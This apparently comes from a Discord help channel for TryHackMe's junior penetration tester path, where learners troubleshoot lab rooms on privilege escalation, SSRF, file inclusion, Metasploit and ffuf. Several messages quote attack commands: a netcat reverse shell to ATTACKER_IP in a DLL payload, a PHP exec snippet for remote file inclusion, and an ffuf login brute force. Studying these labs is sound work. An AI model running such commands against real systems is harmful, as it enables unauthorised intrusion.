I mean, I don't know what your timeline is, but yeah, that's a bit overkill. Between the JPT path and Wreath, you should be more than equipped to handle the eJPT, but be sure to review their materials, too, because some of the stuff on the exam is particular to techniques they teach.

But I'm taking the CySA+ this weekend and then starting the PEN-200 Sunday, so we'll see how it all compares!

Nice, I have Sec+ and like 14 years related experience lol, so we'll see... I'm trying to get the eJPT and Pen+ by November because I have a notional job opportunity... Then OSCP within a year

Bro, with that much experience, you should be able to get through all that well before then. You saw the resources I linked for the PT+?

No? Can you please point me in that direction? I just saw you had eJPT as a role lol

The PenTest+ path on THM plus Jason Dion's Udemy course for the exam. It's got the lectures for both the retired 001 and the 002.

Mind if I shoot you a friend request? You're welcome to dm me with more questions whenever.

And I would contend that their both about the same level of difficulty, with one showing a more technical focus and one more knowledge based.

Nice, yeah that would be great!

ah cool, thanks for the tipp

Gave +1 Rep to @south olive

I am having a problem with the Windows Privilege Escalation room, the part of dll s. Everytime I run x86_64-w64-mingw32-gcc with the required parameters i get this as response:

x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel
-m64: command not found

Does anyone know what I am doing wrong?

@hardy lagoon can you show screenshot? its like its executing on a new line or something

And they were never heard from again

It is all on the same line

-m64 is the output i get

x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel

Discord trims it, it is all on the same line

It does not recognize any of the parameters

AttackBox or own Kali/VPN?

Attackbox

Weird, because my first guess would have been on Kali and you just haven't installed the package.

Nope the package is indeed installed

A bit strange

I'll tryto uninstall it and reinstall again

Yeah, that's super weird. It ran just fine for me.

@hardy lagoon If you verify, you can post screenshots.

!docs verify

@robust sphinx This channel is for that path.

In the upper right hand corner of the task panel, you should see this button to start the machine. Press it, and then wait for the timer to finish loading and press the blue "Show Split View" button to access the machine.

can someone help me or explain what squid proxy is?

Looks like some kind of caching software. You tried Googling it first, I hope?

yes, but I couldn't find anything

So what did you find?

I've been stuck in it for a few days now ]

I mean, I just Googled it and got a general idea, so explain to me what you understand so we can figure out what you don't.

as I said, nothing

basically everything hahaha

Homie, you're gonna need to apply a little more effort than that to succeed in this game.

I tried to understand what it was about or what it was for but I couldn't find anything about it

everything ok, I will research a little more and anything will come back to me later

thanks for the help

Port80-TCP:V=7.92%I=7%D=6/29%Time=62BCFB53%P=x86_64-unknown-linux-gnu%r

I managed to find this

Ok, so like how technically do you need to understand this tool? What'cha trying to do?

I needed to find her version but I can't find it at all

I basically understood what it is for and what it does

So you're trying to find the version on your box or the latest release? Which question are you working on? That might help with context.

I am trying to find the box version, I am doing the beginning of the recognition course

I would re-read the question and text above it:

Reconnaissance***

Squid proxy, does it have a default port? As Bercilak said, Google is your friend.
Can NMAP scan single ports?
Can NMAP enumerate versions?

Everything you need is in the text above the questions

hello guys I have a problem here in SSRF room from JR-penetration test path
the site in task two doesn't work at all there is no error appears or anything it just freezes

i tried to reset progress and remove the browser cookies but still nothing **

Can you interact with the website at all?

I just done it, (I also answered you in #site-support )

yes I can copy and past what i want to the URL section in the site

the ( next ) button is working thou when i get to the final slide nothing happen that's the problem

You need to use the correct url, working out the syntax from the task.

at first when i enter a wrong url i was getting this error (504 Gateway Timeout) but now nothing and i'm using the correct one i'm sure

What's your URL?

https://website.thm/item/2?server=https://server.website.thm/flag?id=9&x=

is it right?

Almost.

but why there is no error appears any more

Nothing happens with that link, at all.

||https://website.thm/item/2?server=[https://]server.website.thm/flag?id=9&x=||

Take out the square brackets.

That's all you need to do. 🙂

nothing happen

thank you for your time but still nothing happen

Server Requesting bar at the bottom show nothing too

Please refresh the room.

And open the site again and go to the end slide.

and paste the command you're using for me please.

Are you still here?

yes

it did not work

i did that

What is your url?

https://website.thm/item/2?server=https://server.website.thm/flag?id=9&x=

You didn't take out the part I asked you to.

Take out the second https:// only

So:
https://website.thm/item/2?server=https://server.website.thm/flag?id=9&x=

becomes

||https://website.thm/item/2?server=server.website.thm/flag?id=9&x= ||

yes it worked thank you so much i was so stupid there was a space at the end

i forgot about that

thanks for your time again

No problem!

Next time, if you want to supply screenshots you can do this by verifying.

!docs verify

Regarding the same topic, for me the command python3.9 /opt/impacket/examples/smbserver.py -smb2support -username thm-unpriv -password Password321 public share does not work and I can not find a workaround. Can you help me with this?

can you show the error you're getting?

The same problem seems to be on the Attack Machine from TryHackMe

that's a python2 script

try just using python instead of python3.9

or just remove python altogether and it'll select whatever it wants

I installed python2 and now is working, thank you 🙂 I think they should also update the command from the instructions

Being able to troubleshoot that sort of thing is kinda an implied task for all these rooms.

When something doesn't work, figuring out why is just as important as making it work.

hey can anyone help me on task 7?

...Of which room?

lmao

facts

Hey guys! Im finishing up on the Windows Privilege Escalation and am on Task 7 Abusing vulnerable software. I was following on really well until the end where it says to "Modify the proxy DLL's payload with a reverse shell to get the flag for this machine"

I'm really stuck here, it might be because it's late at night but I'm just not sure what it means by telling me to Modify the proxy DLL's payload. How would I go about doing that with a reverse shell?

I got myself onto that route a bit ago actually. Im just struggling with what command exactly to put

should I be keeping it as outputting to the output.txt file or just scrap that output and put C:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT ??

ah, okay sweet

Been playing around with how to phrase it for the last like 20 mins. Thank you! Will try it now and see

I still can't seem to get it to work

would anyone mind looking at a screenshot of what I've written and verifying it for me?

nevermind. I ran it one more time and it seemed to have worked. Ty all for help!

Hey, you can Just do it One-by-one. like, Moving to Root Dir, && Move to tools dir, && exec nc64.exe
|| cd / && cd tools && nc64.exe -e cmd . . . .||

Hi,

I am on the NMAP course, task 14, final question - "Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? "

for whatever reason, i have port 21 closed, reason is reset ttl 64

so my answer should be "no" but i get marked as incorrect

has there been an update or am I doing something wrong?

If it's closed, something is wrong.

ok, i'll try another machine later. thanks

Gave +1 Rep to @idle bison

Im on the lfi course and I'm stuck at the final task of gaining a rce from rfi. From what I found it looks like I need to use netcat to establish rce. But im still figuring out what ip to use for it to work?

I'm using my own machine

you need to connect to your VPN ip

How can i see it?

ip a

then the ip under the interface called tun 0

Ah i see

is the vpn works like a lan? meaning I can just serve file in python http server and the site will get it?

yes

ah so great. wished I knew this before. I ended up doing it very ineffeciently using 3rd party site lol

oh, lol

thanks finally made it pass this room

no worries

I didn't understand but I will take a closer look

If there is an error on one of the Q&A's who do we send that to?

are you sure it is not because of the answer tollerance???

if you are sure of that then you can report it in #room-bugs

Possibly, but the command I entered that was marked correct won't work in real life. Or at least I've never made it work like that lol.

refresh the page and check what the answer field says

if it has changed it was due to answer tolerance

Ahhh, lol I refreshed and it add the flag for me. Still marked as correct.

Never seen that happen on here thanks

answer tolerances for the winu

The Bell-La Padula Model is not anything anyone should be teaching to junior pentesters. Its not even a valid modern security model.

Also, the Biba model is equally out of date. Why are we teaching 50 year old security models

Or if anything, atleast call them out for what they are under modern terms: mandatory access controls

#feedback-and-ideas

Wow after that whole Linux priv esc challenge the capstone challenge was super easy!! And I didn't think I was retaining anything. Finally feel like I'm making progress!

So I'm on the File Inclusion room Task 8, challenge 2. And for some reason I get an error when trying to open a Burp Browser to intercept the request. If I try to do it with Burp installed on my own computer it just doesn't catch the Cookies header so I can't really edit anything. Anyone know what I'm doing wrong?

Best to verify so you can send a screenshot of the intercepted request.
Also, you could just use the dev tools to edit the cookie, so there would be no real need for burp iirc

Will try 👍

Hi, I am stuck at content discovery, task 2 and 4. The givenwebsite is unable to connect

What's the URL you are trying to connect to ?

https://10.10.192.225/sitemap.xml

Are you trying to reach it from the attackbox or your own machine ?

From attack box

Use http instead of https

Waw

Thanks

Woot, finished the path!

Hi, I am unable to understand "Virtual Host" part of "Subdomain Enumeration". It is written that a particular server can host multiple websites and "Host" header in a web request will tell the server which website the client is requesting. What I assume will happen after sending a request with a particular host header for eg - "Host: admin.acmeitsupport.com", Firstly a DNS request will be made which will get the public IP address of admin.acmeitsupport.com, and then the web request is sent to that IP address.
It is also explained that sometimes Server may use a private DNS server through which we can get the IP address of domains that were not hosted on publically accessible DNS results for eg - "dev.acmeitsupport.com"
Now we may use DNS Bruteforce to send many request to a domain changing the subdomain part in Host header - "Host: dev.acmeitsupport.com", after which DNS request will be made to get IP address "dev.acmeitsupport.com", but if it is not publicly available we are not going to get any IP address, how are we able to determine if we discover a new website or not? Thanks

Hello guys I need help on Windows Privilege Escalation task 4 can't figure out how to find the flag. Can somebody please give me a hint

This

Thanks you for your answer.
"dev.acmeitsupport.com" and "admin.acmeitsupport.com" both if exist will have separate IP right except if they are on virtual host? If they are on a virtual host, they will have same IP address, but that IP needs to be resolved by a client DNS server, but how did it bypassed DNS in this process?

For eg - We have 2 websites - 1. admin.acmeitsupport.com - this exists
2. dev.acmeitsupport.com - this also exists but in a private DNS server

In first case, if we make first request to "admin" subdomain, the request will look like -
GET / HTTP/1.1
Host: admin.acmeitsupport.com

Now the browser will send a DNS request to get the IP of admin.acmeitsupport.com which it will resolve to some IP as it was publicly accessible, after which it will send the request and we will get the response.

In second case, if we make request to "dev" subdomain, the request will look like -
GET / HTTP/1.1
Host: dev.acmeitsupport.com

This time browser will again send a DNS request but it will not be able to resolve this to an IP as there is no record for this domain in the DNS zone and the request will fail.
So we will not be able to tell if that particular website exists or not.

I am really sorry if this is a very silly question and my understanding is not up to the mark, please help me out. I am pretty sure that I am missing something on TCP 3 way handshake where it already created a session with a particular web server and changing "Host" header is reliable after that but what will be that IP address or rather which server will it connect to and how does it know which server to connect without Host header? Thank you

Gave +1 Rep to @steel nymph

Thank you so much.
Now I understood, we are just adding it to hosts file which will be pointing to a web server which we already know, after which we will send request to that same IP address but changing the "Host" header which causes that web server to respond to the client with the website we want.
I think my English comprehension is little weak. Now rereading your first answer, I am able to understand it. Thank you again and will definitely look up on the terms you provided.

Gave +1 Rep to @steel nymph

Wanna shoot me a DM? I just finished that one. If you follow the instructions for the first half of the task, you should be able to sort it out.

I don't recall whether the AlwaysInstallElevated works for the room, but I know altering the schtask does.

Also, you probably don't want to be in the habit of sharing full screenshots, as it's a good way to accidentally leak info from the background windows on your screen.

I don't usually share a full screenshot but thanks for informing me

@proud ocean don't ask the same thing across several channels, it is spam

ok sorry i'am new..

i just wanted to make sure i was gonna get help

I am currently on Linux PrivEsc : Task 9 Privilege Escalation: Cron Jobs. I set up the NC listener and adjusted the backup.sh file in home directory. Crontab hasnt run the file. What am I missing. I sat and waited for 30 min. Nothing.... I ensured that cron is running.

Check the permissions of backup.sh

Wow... Thank you! Hmmm

Gave +1 Rep to @shadow echo

I'm currently on Metasploit: Exploitation room and i have to use to eternalblue module to exploit a machine. I set the RHOST option and then use run command it doesn't work for some reason i've tried on the attack box and my local machine. It gives the output:

Enter options and show a screenshot of that pls

Here you go

I also tried to change the LHOST to machine IP but that doesn't work either.

You aware that you have set LHOST and RHOSTS to the same IP ?
What is LHOST and what is RHOSTS supposed to be ?

Yes i'm aware about that, i tried with default LHOST option that does not work. LHOST is for local IP and RHOSTS is for remote IP if i'm not wrong.

Right, so set the LHOST to your eth0 IP (since I assume you are using the attackbox ?)
And RHOSTS to the target machine IP.
Also make sure you have nothing listening on port 4444 right now, in case you do, choose a different LPORT thats free

Yes, i'm using attack box. I've set RHOSTS to target machine's IP and i've checked port 4444 is free currently, but it still didn't worked. (Also i set the LHOST to AttackBox's eth0 ip address)

So you again getting "Handler failed to bind" ? Or a different error?

If so, could you try changing the LPORT to 4455 for example ?

It's same as before at the end it say:
[*] Exploit completed, but no session was created.

Oh sure ima try that

Well there is a chance that the target machine is already messed up once you ran the exploit several times.
So the exploit completed but no session was created is not the error that I'm trying to solve right now, it shouldn't say "Handler failed to bind"

So either way, I would restart the target machine, then put the RHOSTS to the new target machine IP and try again

Yeah i just did that, I've terminated the attack box and the target machine. I'll try the exploit again when the machines are ready.

Make sure to set the LHOST right, that's crucial 🙂

Yeah i'll. It worked now xD

Thank you very much for the help

Hey Guys, I have no modules at /opt/metasploit-framework-[version]/modules

Any guide please Do i have to download modules sperat**y

Are you accessing this in attacker box or in your own Kali?

I'm using Ubuntu in my laptop

Check
/usr/share/metasploit-framework/modules

Ubuntu then you have to download metasploit

I have downloaded

/opt/metasploit-framwork exists but not modules dir

From where did you download MSF?

Is it running on typing
MSF console?

msfconsle is running

https://www.darkoperator.com/installing-metasploit-in-ubunt

i think from Ubuntu repo

https://github.com/rapid7/metasploit-framework

Follow this

Ohh-k brother

In this repo modules are available

Thanks for your time. Will let you once done.

But I recommend that it is better to download Kali

Or use parrot OS instead

Because parrot OS is multipurpose

You can use parrot OS for multi tasking
And pentesting and as a home desktop

They come with pre installed. But i want to do all things manually. For the sake of fundamental understanding.

Ok then you can

Once I will be able to do these manually then I will shift to parrot or kali

But not recommended
Because you have to just install the things and setting up

Ok no problem
By the way, you will learn to install and download things as well

This is what i prefer as a beginner.

That's it brother.

Anyhow. Thanks @valid cape

Gave +1 Rep to @valid cape

For your precocious time and guide.

Best of luck
You can DM me anytime you want
I'll answer you whenever I'll be free

That's great. ☺️

is it just me or is foxyproxy not working in chrome/brave?

Have you got it set up?

I use it in chrome all the time I use it.

i tried it in brave for the first burp suite box but it won't download the certificate

but in firefox it does and the ui looks different/better anyway

but firefox isn't my main browser :\ @remote iris

Did you set it the host and port?

yeah ofc 127.0.0.1 host and 8080 port

but the chromium version looks like its underdeveloped anyway and missing some features

I don't use the chomuim that Burp boots, I use the chrome.

yeah but chrome and brave are obviously

chromium browsers

so the same foxyproxy

version

Yeah, I don't look at the UI, I just browse.

is that so

Yeah, no point looking at the UI, it doesn't tell me anything useful other than it's connected.

What type of information could be stored in txt records that will useful during a Pentest ?

Cheers! James 🙂

Just... you should know better by now

I accept that but I was after specifics like I found XYZ there which should not have been. Your findings keep me on track.

You should have googled it and read those.

Also, please keep non path related questions elsewhere, like #infosec-general

How do you define 'Non path' questions as my questions relate to Task 4 of Passive Recon section of Jr Pentesting ?

If it's a question about a room in the path, state which room and question.
In this case, it's pretty tangential

Just a note for the Windows Privesc room at the end of the path: a walkthrough has been published.

Hi friends 🙂

Could I please get some help with regards to Intro to Web Hacking -> Walking an application?

specifically the Debugger section

When I use Firefox I can only see bootstrap.min.js, jquery.min.js and site.js under assets.

with Chrome or Edge browsers I see additional ones like bootstrap.min.css and style.css but I can't find flash.min.js no matter which browsers I use

Thank you in advance...

Hey I am having trouble on the windows priv escalation. I am on task 7 and when I try to edit the druvansync exploit file it says I don’t have permission. What am I missing?

Anybody help me out here?

im trying to access tryhackme machine but with no use

consider im using the openvpn and the ip is correct and working

what room is it? I don't think you're supposed to ssh into the machine there, if you have to ssh in you'll need a ssh private key

room Subdomain Enumeration

and where does it say to ssh in?

I need to enter this command ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.200.108

isn't the path in local ?

answer this plz 🙂

he didn't say

but he gave me an ip and the path in the local right?

what's path, what's local

wait

wait a min

I think im stupid

Nevermind I'm stupid

@maiden stratus thanks

Gave +1 Rep to @maiden stratus

and sorry for wasting your time

No problem 🙂

I'll be more careful next time

Hello,
I am stuck on Windows Privilege Escalation - Task 7 Abusing vulnerable software.
I cannot get into the Administrator directory and I cannot 'type' the flag.txt file. Access is Denied…
I created a new user account and added it to the administrator local group (pwnd).
Any help would be appreciated.

SOLVED! I was able to get to it through the GUI. Then I realized my command prompt want runnin as admin

where ?

hello everyone ! i need your help i'm stuck on this level for hours https://tryhackme.com/room/windowsprivesc20# in task 6 in priesc on windows any help will be appriciate

@solid folio @stray cape

lmfao

Hey all, task 5 of Linux priv Esc.

I understand exactly what needs to be done, however, I don't understand why it needs to be done this way.

Why can't I just wget the exploit to the server?
Why do I need to transfer it via a Python Html server?

Thanks in advance 🙂

This is what I was starting to suspect

cheers lassi 🙂

I figured it was either some kind of IPS blocking exploit-db or simply no internet access

time for a dumb question.
Is there a command I should have run or something to figure that out? Or should have the fact wget wasn't working been enough for me to figure it out

guess I could try pinging google

ah okayokay cool, cheers mate

just wasn't sure if I was missing something more complicated

I always tend to over complicate these things lmao

Hey guys, having trouble getting output from ffuf. Can someone help me out? In room Authentication Bypass/Brute Force.

I did create a file valid_usernames.txt and it is saved in /Desktop. While in the same directory as the file that was creating, I run this command

|| ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.119.23/customers/login -fc 200
||

The following returns

:: Method : POST
:: URL : http://10.10.119.23/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200

:: Progress: [40/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0
:: Progress: [194/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [353/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
:: Progress: [400/400] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
0 ::

Not providing me with the desired output, the username/password?? Thank you!

god this looks so confusing

hello, im havinf trouble submitting my answers. it says answer in format *********** and idk what that means

https://tenor.com/view/cat-clown-matrix-clown-costume-gif-17340123

sure is a pain

Most likely your valid_usernames.txt is not right

It's supposed to only hold the usernames and not any other data like size, status etc.

It means that the answer has 3 characters

ohh, thank you

Thank you, made another file just with usernames capture. It worked! 👍

Gave +1 Rep to @shadow echo

was the Win_PrivEsc part for the JR_Pentest updated or replaced by new Win_PrivEsc room?

it was replaced

the new one seems a lot more thorough

so the old one was completely removed...

i'm stuck in task_7...

done finally...took me like 1hr. kinda tricky

think so yeh. i was in the middle of this module while it changed hahaha

would love to do that old one

think its only task 6/7 which have been changed

dll hijacking is not there i think

which task did that come under??

the old one

thats old old....

ya it is..took screenshot from YT videos lol

this is the one i was working on...

found a room for DLL hijacking https://tryhackme.com/room/dllhijacking

Hey Mates, I am facing an issue with msfvenom, I'm not able to generate windows x64 reverse shell payload do anyone have any idea of this error

Remove the <>

Ohh Thanks @idle bison

Gave +1 Rep to @idle bison

Done

anyone recommend CTF/challenges after completing Windows PrivEsc....

File Inclusion . Task 8 Challenge
Capture Flag2 at /etc/flag2

Why I can't get access to admin page ? I changed cookie Cookie: THM=Guest to THM=admin and still nothing

ok

https://i.gyazo.com/968d02883264e315b0911ff3aab0b40a.png

oh i got it thank you

welcome admin now. ty

Gave +1 Rep to @steel nymph

in the SSRF room, why does the directory traversal trick require an x to be used infront of the /../

in the Linux PrivEsc room under the Cron Jobs module I thinks its good if we also add pspy as a tool to check for ongoing cron jobs that arent listed in the system crontab.

please help

With what?

So here I need to the to:
create cmd.txt file and contains <?php print exec('hostname); ?> code
create webserver python3 -m http.server

and finally host my web server here

I did all that but the flag not appearing why?

wait a min please

http://10.0.2.15/cmd.txt

i took this url in my browser field and worked!

wait

wait please

didn't work

I did everything

should i just copy the answer ?

ok last question

You mean this ip right?

ummm

but

when i run it on my windows and open the sites ( tryhackme ask me to )

i open it with mv kali linux and vpn running on windows and it works

but ok i will download openvpn on vm kali and try

ok i'll try

thanks I'll try tomorrow

Gave +1 Rep to @steel nymph

@steel nymph I set things up